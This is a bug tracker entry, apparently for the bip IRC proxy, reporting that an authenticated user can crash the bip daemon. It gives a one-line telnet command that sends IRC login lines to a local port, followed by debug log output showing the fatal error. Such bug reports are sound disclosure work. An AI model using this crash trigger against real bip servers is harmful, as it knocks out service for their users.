Project

General

Profile

Bug #432

Updated by Pierre-Louis Bonicoli almost 5 years ago

Fran found that these commands allow an authenticated to DOS bip user (with a call to stop bip daemon: @fatal@ function):
<pre>
{ echo PASS bipnick:mysecretpassword:freenode; echo NICK Pilou; echo USER Pilou 0 Pilou :blah; sleep 2; } | telnet 127.0.0.1 7778 | read
</pre>

<pre>
15-01-2015 04:26:44 DEBUG: Trying to accept new client on 0
15-01-2015 04:26:44 DEBUG: New client on socket 41 !
15-01-2015 04:26:44 DEBUG: fd:41 Connection established !
15-01-2015 04:26:44 DEBUG: "PASS bipnick:mysecretpassword:freenode"
15-01-2015 04:26:44 DEBUG: "NICK Pilou"
15-01-2015 04:26:44 DEBUG: "USER Pilou 0 Pilou :blah"
15-01-2015 04:26:44 DEBUG: Connection close asked. FD:41
15-01-2015 04:26:44 DEBUG: A client connected
15-01-2015 04:26:44 FATAL: select(): Bad file descriptor
</pre>

Back